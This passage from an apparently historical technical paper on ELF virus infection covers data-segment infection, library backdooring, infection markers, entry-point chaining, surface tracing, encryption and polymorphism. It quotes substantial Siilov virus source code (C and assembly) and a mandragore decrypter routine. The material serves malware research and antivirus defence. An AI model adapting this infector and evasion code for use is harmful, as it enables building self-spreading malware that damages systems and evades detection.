Note that the section name of data1 is used. An arbitrary name cannot be chosen as it will be removed by object tools such as strip considering it non essential for the program (irrespective if sh_type is SHT_PROGBITS). Also the section header string table must be modified to reflect the new section name. The algorithm is:

        * Patch the insertion code (parasite) to jump to the entry point
          (original)
        * Locate the data segment
                * Modify the entry point of the ELF header to point to the new
                  code (p_vaddr + p_memsz)
                * Increase p_filesz to account for the new code and .bss
                * Increase p_memsz to account for the new code
                * Find the length of the .bss section (p_memsz - p_filesz)
        * For each phdr who's segment is after the insertion (text segment)
                * increase p_offset to reflect the new position after insertion
	* Construct a new shdr table
	* Add the new virus section after bss
	* For the shdr's from section header table but before symtab
		* Increase the sh_offset to account for the new code
	* For the symtab shdr
		* Increase sh_offset to account for new code + sizeof(".data1")
        * Find the bss shdr
                * Modify sh_size to 0
        * Physically insert the new code into the file

This almost works, but we forget that the ELF specifications also say that sh_link in each section header points to supplmentary section information. More specifically, the section header table references the string table for the that but we check everything else to be sure (Siilov does this).

        * Patch the insertion code (parasite) to jump to the entry point
          (original)
        * Locate the data segment
                * Modify the entry point of the ELF header to point to the new
                  code (p_vaddr + p_memsz)
                * Increase p_filesz to account for the new code and .bss
                * Increase p_memsz to account for the new code
                * Find the length of the .bss section (p_memsz - p_filesz)
        * For each phdr who's segment is after the insertion (text segment)
                * increase p_offset to reflect the new position after insertion
        * Construct a new shdr table
	* For every shdr after the .bss
		* if sh_link is non zero, increase by one
        * Add the new virus section after bss
        * For the shdr's from section header table but before symtab
                * Increase the sh_offset to account for the new code
        * For the symtab shdr
                * Increase sh_offset to account for new code + sizeof(".data1")
        * Find the bss shdr
                * Modify sh_size to 0
        * Physically insert the new code into the file

Infecting the data segment is the most preferred solution by current viruses before the year 2000, and is implemented in the Siilov virus, (Cesare 1999), however, this if left as is is suspicious because the entry point of the program is in a segment which doesnt contain executeable code. Siilov uses the technique described in the next section that leaves the entry point unchanged from its original address.

Looking at a real life example of data infection we show some of the code used in the Siilov virus (Cesare 1999).

	(*) This is just for clarity.  The real virus code uses a function
	to extract the string which uses position independant code

	DEBUG_STRING = ".data1"	(*)

	.
	.
	.

	typedef struct {
        	Elf32_Ehdr      ehdr;
        	Elf32_Phdr*     phdr;
        	Elf32_Shdr*     shdr;
        	int             plen;
        	char**          section;
        	char*           string;
        	int             bss;
	} bin_t;
	
	.
	.
	.

        phdr = bin.phdr;
        for (i = 0; i < bin.ehdr.e_phnum; i++) {
                if (phdr->p_type == PT_LOAD) {
                        if (phdr->p_offset == 0) {
                                text_start = phdr->p_vaddr;
                        } else {
                                if (text_start < 0) goto bin_error;
	/* is this the data segment ? */
                                offset = phdr->p_offset + phdr->p_filesz;
                                bss_len = phdr->p_memsz - phdr->p_filesz;
                                if (init_virus(
                                        plt,
                                        phdr->p_vaddr,
                                        phdr->p_memsz,
                                        bin.ehdr.e_entry,
                                        &bin
                                ) < 0) goto bin_error;
                                break;
                        }
                }
                ++phdr;
        }
        addlen = VIRUS_LENGTH + bss_len;
	/*
        	update the phdr's to reflect the extention of the 
		data segment (to allow virus insertion)
	*/
        phdr = bin.phdr;
        for (i = 0; i < bin.ehdr.e_phnum; i++) {
                if (phdr->p_type != PT_DYNAMIC) {
                        if (move) {
                                phdr->p_offset += addlen;
                        } else if (phdr->p_type == PT_LOAD && phdr->p_offset) {
	/* is this the data segment ? */
                                phdr->p_filesz += addlen;
                                phdr->p_memsz += addlen;
                                move = 1;
                        }
                }
                ++phdr;
        }

	.
	.
	.

        out = _open(tempname, O_WRONLY | O_CREAT | O_EXCL, st_buf.st_mode);
        if (out < 0) goto bin_error;
        addlen2 = addlen + _strlen(DEBUG_STRING);
        addlen3 = addlen2 + sizeof(Elf32_Shdr);
        bin.ehdr.e_shoff += addlen2;
        ++bin.ehdr.e_shstrndx;
        ++bin.ehdr.e_shnum;
        if (_write(out, &bin.ehdr, sizeof(Elf32_Ehdr)) != sizeof(Elf32_Ehdr))
                goto cleanup;
	/*
       		we use the ehdr later on
	*/
        --bin.ehdr.e_shnum;
        --bin.ehdr.e_shstrndx;
        if (_write(out, bin.phdr, bin.plen) != bin.plen) goto cleanup;
        for (i = 0; i < bin.bss; i++) {
                if (_lseek(out, bin.shdr[i].sh_offset, SEEK_SET) < 0)
                        goto cleanup;
                if (_write(
                        out, bin.section[i], bin.shdr[i].sh_size
                ) != bin.shdr[i].sh_size)
                        goto cleanup;
        }
        zero = (char *)_malloc(bss_len);
        if (zero == NULL) goto cleanup;
        memzero(zero, bss_len);
        if (_write(out, zero, bss_len) != bss_len) goto zero_error;
        _free(zero);
        if (_write(out, get_virus(), VIRUS_LENGTH) != VIRUS_LENGTH)
                goto cleanup;
        for (++i; i <= bin.ehdr.e_shstrndx; i++) {
                if (_lseek(out, addlen + bin.shdr[i].sh_offset, SEEK_SET) < 0)
                        goto cleanup;
                if (_write(
                        out, bin.section[i], bin.shdr[i].sh_size
                ) != bin.shdr[i].sh_size) goto cleanup;
        }
        if (_write(
                out, DEBUG_STRING, _strlen(DEBUG_STRING)
        ) != _strlen(DEBUG_STRING)) goto cleanup;
        if (_lseek(out, bin.ehdr.e_shoff, SEEK_SET) < 0) goto zero_error;
        for (i = 0; i < bin.bss; i++)
                if (_write(
                        out, &bin.shdr[i], sizeof(Elf32_Shdr)
                ) != sizeof(Elf32_Shdr)) goto cleanup;
        newshdr.sh_name = bin.shdr[bin.ehdr.e_shstrndx].sh_size;
        newshdr.sh_type = SHT_PROGBITS;
        newshdr.sh_flags = SHF_ALLOC | SHF_WRITE;
        newshdr.sh_addr = bin.shdr[i].sh_addr;
        newshdr.sh_offset = offset;
        newshdr.sh_size = addlen;
        newshdr.sh_link = 0;
        newshdr.sh_info = 0;
        newshdr.sh_addralign = 0;
        newshdr.sh_entsize = 0;
        if (_write(out, &newshdr, sizeof(Elf32_Shdr)) != sizeof(Elf32_Shdr))
                goto cleanup;
        for (j = 0; j < bin.ehdr.e_shnum; j++)
                if (bin.shdr[j].sh_link > i) ++bin.shdr[j].sh_link;
        bin.shdr[i].sh_offset += addlen;
        bin.shdr[i].sh_addr += addlen;
        bin.shdr[i].sh_size = 0;
        if (_write(
                out, &bin.shdr[i], sizeof(Elf32_Shdr)
        ) != sizeof(Elf32_Shdr)) goto cleanup;
        for (++i; i < bin.ehdr.e_shstrndx; i++) {
                bin.shdr[i].sh_offset += addlen;
                if (_write(
                        out, &bin.shdr[i], sizeof(Elf32_Shdr)
                ) != sizeof(Elf32_Shdr)) goto cleanup;
        }
        bin.shdr[i].sh_size += _strlen(DEBUG_STRING);
        bin.shdr[i].sh_offset += addlen;
        if (_write(
                out, &bin.shdr[i], sizeof(Elf32_Shdr)
        ) != sizeof(Elf32_Shdr)) goto cleanup;
        for (++i; i < bin.ehdr.e_shnum; i++) {
                bin.shdr[i].sh_offset += addlen3;
                if (_write(
                        out, &bin.shdr[i], sizeof(Elf32_Shdr)
                ) != sizeof(Elf32_Shdr)) goto cleanup;
        }
        for (i = bin.ehdr.e_shstrndx + 1; i < bin.ehdr.e_shnum; i++) {
	/*
        	we've already added to the offset
	*/
                if (_lseek(out, bin.shdr[i].sh_offset, SEEK_SET) < 0)
                        goto cleanup;
                if (_write(
                        out, bin.section[i], bin.shdr[i].sh_size
                ) != bin.shdr[i].sh_size) goto cleanup;
        }
        if (_rename(tempname, host) < 0) goto cleanup;

	.
	.
	.

Program Header Insertion

Another infection technique is to simply create a new program segment. Naturally, the virus/parasite must surround the original segments. This is so no conflicts of address space occur.

This method is not widely used and justly so. An extra program header is certainly obvious to the parasites detection. Also, since other infection techniques do almost exactly the same in regards to where the parasite code is inserted, why use program header insertion when it breaks the orthodox nature of the binary.

Miscelaneous Infection

Another approach to ELF infection is to use more than one infection technique, such as padding and data infection. The reason for this, is that under some stricter operating systems, the data segment may not be executeable. As stated earlier, the data segment is marked non executeable (rw), but due to lax architectures and operating systems, write permission often implies execute permission. However, for an operating system where this isnt the case and all permissions are enforced, then it may be effective to use padding or text infection to initially run the virus. Then, once running in the text segment, the data segment may be marked executeable using system dependant system calls. After completion, the data segment virus may be run as normal. This approach offers the best of both worlds for text and data segment infection. The true nature of an executeable only text segment, and the flexible nature of the data infection technique presented.

Library Infection

Modern operating systems use two forms of library object files. These are static libraries and shared libraries. The exact nature of the differences between the two come into play when we look at linking. Libraries provide a means to provide common code for executeables without unnecessary redundancy. They do this, by providing the common code into a single object, that is, the library. Executable object can reference procedures and functions in these libraries, thus no duplicate code is uses for each executeable. At a later time, at run time or compile time, the library is linked into the executeable object thus providing a fully functional binary. Static libraries must be linked to produce a functional executeable directly following compile time, when linking is carried out as normally. Thus, static libraries get treated like any other regular object file. Shared or dynamic libraries get linked with the executeable at runtime.

Dynamic linked and static libraries both have similar structures. Both must be compiled to produce a relocatable object. Dynamically linked libraries are not the typical form of relocatable objects as seen with pure object code such as static libraries. Dynamic libraries include fully link edited object code, but also include relocation information. This is so the library can optionally be relocated if the address space it was link edited for changes. This approach offers a number of advantages. Typically, you will find an increase in speed if the library does not need to be relocated. However, it provides the same flexibility of a relocatable object. Contrary to the benefits provided, most shared libraries do not use many relocation entries. This can be achieved by compiling using position independant code. This is to achieve faster relocation of the object at runtime. That is, few relocation entries must be processes to relocate the image.

Published in Phrack, (issue 56, klog) an article described a technique on "backdooring" static and shared libraries. This was achieved by inserting hostile code such that it intercept procedures declared by the object. The exact technique described at first glance is not particulary useful since the code give requires the BFD library. This isnt desireable in a virus for the reasons given earlier. That is, external libraries make inserting parasite code into a binary difficult due to the extra overhead of inserting new libraries to be linked in with the host binary. However, the technique mentioned in the article is illuminating, and more object format techniques can be derived.

The main emphasis of the article is that using BFD you can read in a library, then write the binary back out, having inserted hostile code. The first obstacle, is where do we insert the hostile code. The author presents the following solutions.

[ from p56 ]

For both shared and static objects, we try to insert new executeable code into the last section possible for our purposes. This is so absolute references do not break down when used by previous sections. Thus if we look at a static object...

        $ objdump -h /usr/lib/crt1.o

        /usr/lib/crt1.o:     file format elf32-i386

        Sections:
        Idx Name          Size      VMA       LMA       File off  Algn
          0 .text         00000080  00000000  00000000  00000040  2**4
                          CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
          1 .data         00000004  00000000  00000000  000000c0  2**2
                          CONTENTS, ALLOC, LOAD, DATA
          2 .bss          00000000  00000000  00000000  000000c4  2**2
                          ALLOC

In this example, klog suggests the .data section is extended and the hostile code inserted in this extention. Likewise for shared objects we see the following scenario...

        $ objdump -h lib.so

        lib.so:     file format elf32-i386

        Sections:
        Idx Name          Size      VMA       LMA       File off  Algn
          0 .hash         0000003c  00000094  00000094  00000094  2**2
                          CONTENTS, ALLOC, LOAD, READONLY, DATA
          1 .dynsym       000000a0  000000d0  000000d0  000000d0  2**2
                          CONTENTS, ALLOC, LOAD, READONLY, DATA
          2 .dynstr       00000050  00000170  00000170  00000170  2**0
                          CONTENTS, ALLOC, LOAD, READONLY, DATA
          3 .rel.text     00000018  000001c0  000001c0  000001c0  2**2
                          CONTENTS, ALLOC, LOAD, READONLY, DATA
          4 .text         00000028  000001d8  000001d8  000001d8  2**2
                          CONTENTS, ALLOC, LOAD, READONLY, CODE
          5 .rodata       00000006  00000200  00000200  00000200  2**0
                          CONTENTS, ALLOC, LOAD, READONLY, DATA
          6 .data         00000000  00001208  00001208  00000208  2**2
                          CONTENTS, ALLOC, LOAD, DATA
          7 .got          0000000c  00001208  00001208  00000208  2**2
                          CONTENTS, ALLOC, LOAD, DATA
          8 .dynamic      00000050  00001214  00001214  00000214  2**2
                          CONTENTS, ALLOC, LOAD, DATA
          9 .bss          00000000  00001264  00001264  00000264  2**2
                          ALLOC
         10 .note         00000014  00000000  00000000  00000264  2**0
                          CONTENTS, READONLY
         11 .comment      00000012  00000000  00000000  00000278  2**0
                          CONTENTS, READONLY

In this dynamically linked example, we cannot use the .data section because this would break references to the .got. Instead we use that section itself; the Global Offset Table section.

The author of this article in Phrack failed to mention that using this technique would break references to the BSS section. A possible solution to this, is to use the technique used for data infection presented earlier. That is, to fill a pseudo BSS section contained in the data segment (or got in this example) itself.

[ explain better ]

Intercepting declared library functions meant replacing that symbol tables entry and then referencing the old function in the hostile procedure using absolute references.

This technique is very portable using the BFD library and is useful for blackhat (hacker) style purposes in implanting trapdoors into libraries on the system. For a virus, BFD would almost certainly have to be replaced with more custom built code for each platform and object format.

[ talk about ELF now ]

Object Files

An interesting method to infect ELF binaries is to use relocatable ELF objects as the object code to inject. Note that to do this requires the relocatable file be link edited at infection time. That is, the code that is injected, must be relocated to a specific load address determined by the type of infection method used. If text infection is used, the code must be relocated to appear before the text segment of the host. Likewise, if data infection is used, then the parasite must be relocated to appear at the end of the host's data segment.

This method of using relocatable objects is practical only for single or one off infections. That is because after link editing, the relocation information is lost. Thus, the parasite cannot be relocated again. It is possible to include relocation information into the parasite so relinking is possible, but this seems to defeat the purpose of using this technique. It is quicker in development and theory of using the typical case of position independant code as the parasite.

Infecting Infections

A real problem with infecting host programs in a virus, is the decision on re-infecting binaries. That is, once a host has become infected, is it allowable that the virus infect that already infected host again. Most modern day viruses take this fact into account, and design their virus such that it is able to detect the virus in host programs. Typically, these infected binaries are then skipped in favour of virus free programs.

A common technique in identifying infected programs is to mark the host with a signature. By detecting this signature in a host, the binary can be recognized as being infected by the virus. The FILE, aka Silvio virus (Cesare 1999) appends a special string to the end of the infected binary. By examining the last few bytes of any binary, a determination can be made if the program has been infected. As with the Bliss virus and other simple viruses, such techniques have unwanted side effects. The FILE virus was not strip safe, and simply appending a string to a binary without modification of the internal ELF headers generally makes the file non strip safe. Thus, by appending a string to a binary, if the file is stripped, the appended string is deleted in a stripped binary.

Another signature technique was used in vir.s (Stealth 1999). In this approach, the ELF header was modified such that the e_machine field (which identifies the architecture the binary is for) is changed from EM_386 to EM_486. Binaries then present with a machine type of EM_486 were skipped. This also has a side effect, but this time, the side effect is carefully constructed. By changing the machine type, the BFD library used to typically examine the binary in question, fails to recognize the binary type. This is because the default architecture for this virus was EM_386, and even though EM_486 is almost identical, bar a modified instruction set, BFD cannot recognize this. This means, that it is impossible to examine the binary, using the GNU debugger gdb or view the binary using objdump or other tools, without modification to the binary or the libraries involved.

A similar technique is used by the mandragore virus. In this virus, the ELF header was modified such that the seventh byte in the file was marked with an exclamation mark in ascii. Thus, the virus was able to identify itself without changing the results of strip, as does vir.s.

A different approach to the previous techniques, but still signature based is used by the VIT virus (Cesare 1998). In this virus, it was an implicit side effect to infection that a binary could not be infected twice in a row. This is because the virus used the padding between the text and data segments. This is typically less than 4k in size. The virus, was a little over 2k. Before infecting a binary, it would check that the padding was large enough to contain the virus. After an infection, the padding size would be less than 2k in size assuming a large 4k of original host padding. Thus, the virus could not infect the binary twice in a row.

The Siilov virus is also a signature based virus. In this virus, an infected binary gets a new section inserted into the binary. This section, the .data1 section, is typically not present in regular binaries. Thus the Siilov virus can detect itself.

A naive approach to virus immunity is to apply these signatures to uninfected binaries. Thus, any particular virus that implements these techniques would skip the host during its infection cycle since it believes it to be already infected. This approach works, but because a binary must be marked with a multitude of signatures, problems arise. For example, if the last few bytes of a binary is the virus signature, what happens when two viruses use this technique; both cant be the last data signature in the host.

Chainging

To fix the problem of the entry point being in the wrong segment when used in infection, we can do some assembler trickery that is almost exclusively used in viruses on operating systems without memory protection such as MS-DOS. Ideally, we want the entry point of the host to remain the same, but if we leave the entry point the same, how do we transfer control to the virus?

The solution to this is to modify the code at the entry point with a branch instruction pointing to the virus code. The virus code can then restore thist instruction and call it when the virus code exits. For the smart reader, you may be asking how it is possible to restore the code if the text segment is read only.

Although non portable, Linux, and other operating systems have a system call to change the permission on memory regions in sizes congruent to modulo the page size or in simpler terms, sizes that align with page sizes. Thus before restoring the text segment code, we change the access so we can write to it. This technique is also demonstrated in the Siilov virus, (Cesare 1999).

CHAINING ALGORITHM

	* replace the start (entry) of the program with a jump instruction
	  to the end of the program
	* append the virus to the end of the program to align the start with
	  the destination of the jump in the previous part of the algorithm
	* mark the first page of the text segment writeable
	* have the virus replace the jump instruction with its original
	* jump back to the start of the program

Another way of looking at the algorithm is to follow how the process image and flow changes.

	[ chain       ] --+
	[ host        ]   |
	[ virus       ] <-+
	[ virus.done  ]
	[ host.store  ]

	[ host.store  ] <-+
	[ host        ]   |
	[ virus       ]   |
	[ virus.done  ] --+
	[ host.store  ]  

	* host.store is simply what would be in the original host instead of
	the chain

Looking at a real life example from the Siilov virus (Cesare 1999) we can see this in action.

ENTRY POINT CHAINING CODE
-------------------------

void virchfunc(void)
{
__asm__("
.globl virchstart
        .type virchstart,@function
virchstart:
        call virchmain
virchmain:
        popl %esi                               #
        addl $(virchdata - virchmain),%esi      # movl $virdata,%esi

        movl data_entry_point - virchdata(%esi),%edi
                                                # movl data_entry_point,%edi
        jmp *%edi

.globl getvirchdata
        .type getvirchdata,@function
getvirchdata:

        pushl %ebp
        movl %esp,%ebp

        call virchreloc
virchreloc:
        popl %eax
        addl $(virchdata - virchreloc),%eax

        movl %ebp,%esp
        popl %ebp
        ret

virchdata:

.globl data_entry_point
        .size data_entry_point,4
        .type data_entry_point,@object
data_entry_point:
.long 0

.globl virchend
        .type virchend,@function
virchend:
");
}


MAIN VIRUS CODE - TRANSFER CONTROL TO HOST CHAINING
---------------------------------------------------

void virfunc(void)
{
__asm__("
.globl L1
        .type virstart,@function
virstart:
        pushl %eax
        pushl %ebx
        pushl %ecx
        pushl %edx

.
.	[ deleted for brevierity ]
.

        movl $125,%eax
        movl orig_entry_point - virdata(%esi),%ebx
        movl %ebx,%edi                          # for later
        andl $~4095,%ebx
        movl $8192,%ecx
        movl $7,%edx
        int $0x80

        pushl %edi
        leal store - virdata(%esi),%esi
        movl $(virchend - virchstart),%ecx
        rep
        movsb

        call _vstart

        popl %edi
        popl %edx
        popl %ecx
        popl %ebx
        popl %eax

        jmp *%edi

.
.	[ deleted for brevierity ]
.

virdata:

orig_entry_point:
.long 0

store:
        .zero virchend - virchstart

");

* Notice that these virus routines are written in C and hence require extra
work to use variables since these can be accessed by the rest of the virus
code.  Also for the fact that the variables must be relocatable since the virus
can be inserted at any position in the host's address space.

Surface Tracing

Surface tracing was developed in the MS-DOS era and is similar to chaining, however, instead of overwriting random instructions of the host with a jump to the binary, we wait until the host makes its own jump or call. This provides the virus with an entry point, since we can overwrite the host's branch instruction so that it points to the virus. The virus can then return control back to the host when its finished, typically after calling the code that was in the original branch instruction. The only problem occurs when a branch instruction is modified when the branch rarely happens. This normally isnt the case however early in the host's image. This technique is also very hard to detect by an anti virus product.

	HOST			VIRUS
	----			-----
	pushl $0x8000			pushl $0x8000
	call printf			call virus
	subl $0x8, %esp			subl $0x8, %esp

				virus:
					pusha
					pushf
					# virus main
					popfl
					popa
					call printf
					ret

Encryption

The techniques described in the previous section, such as chaining and surface tracing are useful tools to evade infection detection. However, these types of viruses can be easily detected using scanning software. It can detect these viruses because the virus image remains static. That is, the virus that can be detected simply by exmaining binaries looking for a common signature that is unique for that virus. Note that many viruses use similar code, so finding a unique signature is necessary for specific detection of certain viruses.

A technique that appeared in the MS-DOS environment, to defeat such simplistic scanners was developled as encryption. Using encryption, the majority of the virus is no longer static. This is because the main body of the virus is encrypted and on each infection, the encrypted body changes through changes in the key. The only code that needs to be in plain text is the decrypter or loader of the virus. These can be coded remarkably small and thus the virus scanner only has a small amount of static virus image to detect the virus.

The mandragore virus is the first virus to publicly demonstrate encryption in the unix environment in regards to binary infection.

MANDRAGORE DECRYPTER ROUTINE

	bov:
	        db 0beh				;  mov esi
	.adrboc dd .boc				;
	        mov edi,esi
	        mov ecx,virsiz/2
	.decrypt:
	        lodsw
	        db 66h,35h                      ;  xor ax,
	.xorval dw 0
	        stosw
	        loop .decrypt

Polymorphism

Polymorphic virus can defeat such scanners that use signatures to detect viruses and hostile code because the virus changes the virus code in each infection.

Polymorphism is split into several stages. For one, polymorphic engines dont work on the entire virus as such a process would be very expensive. Instead, the virus is split into two parts. The body of the virus is encrypted, using a key which can be changed on repeated infection. And a decryption routine. The decryption routine is modified by polymorphism and the key for the encryption changed on each infection.

How do polymophic engines work then? Various methods can be used to modify a section of code to produce equivalent code but using a differernt set of instructions. Techniques include adding no operation instructions into the code, re-ordering of instructions, or using different registers. Needless to say, polymorphic viruses require special care when writing anti virus software.